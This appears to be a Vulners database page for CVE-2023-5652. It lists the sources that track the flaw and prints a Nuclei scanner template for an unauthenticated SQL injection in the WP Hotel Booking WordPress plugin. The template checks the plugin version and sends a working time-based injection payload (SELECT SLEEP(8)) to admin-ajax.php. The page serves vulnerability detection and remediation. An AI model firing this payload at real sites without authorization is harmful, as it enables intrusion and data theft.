| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-5652 | 12 Mar 202621:02 | – | circl | |
| WordPress Plugin WP Hotel Booking Security Vulnerability | 20 Nov 202300:00 | – | cnnvd | |
| CVE-2023-5652 | 20 Nov 202318:55 | – | cve | |
| CVE-2023-5652 WP Hotel Booking < 2.0.8 - Unauthenticated SQLi | 20 Nov 202318:55 | – | cvelist | |
| CVE-2023-5652 | 20 Nov 202319:15 | – | nvd | |
| CVE-2023-5652 | 20 Nov 202319:15 | – | osv | |
| Sql injection | 20 Nov 202319:15 | – | prion | |
| PT-2023-32238 | 20 Nov 202300:00 | – | ptsecurity | |
| CVE-2023-5652 | 23 May 202504:32 | – | redhatcve | |
| WP Hotel Booking < 2.0.8 - Unauthenticated SQLi | 26 Oct 202300:00 | – | wpexploit |
id: CVE-2023-5652
info:
name: WP Hotel Booking <= 2.0.7 - SQL Injection
author: Shivam Kamboj,s4e-io
severity: critical
description: |
WP Hotel Booking WordPress plugin before 2.0.8 contains a SQL injection caused by lack of authorization, CSRF checks, and input escaping in a function hooked to admin_init, letting unauthenticated users perform SQL injections, exploit requires no authentication.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to version 2.0.8 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking/wp-hotel-booking-207-unauthenticated-sql-injection
- https://nvd.nist.gov/vuln/detail/CVE-2023-5652
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5652
epss-score: 0.63711
epss-percentile: 0.99116
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,wp-hotel-booking,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-hotel-booking/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<= 2.0.7")'
- 'contains(body, "WP Hotel Booking")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"
internal: true
- raw:
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT SLEEP(8)), term_id=CASE when 1=1 THEN 1
matchers:
- type: dsl
dsl:
- 'duration>=8'
- 'regex("^0$", body)'
- 'status_code == 400'
- 'contains(content_type, "text/html")'
condition: and
# digest: 490a0046304402205fce3214a00a14b242bd6c5e0a9a7b025144d285fb0ad4e224788203950f09e5022011111df6263c9870c9e8f6442fa53b353432ce270b963245ce428e4e6ea85352:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation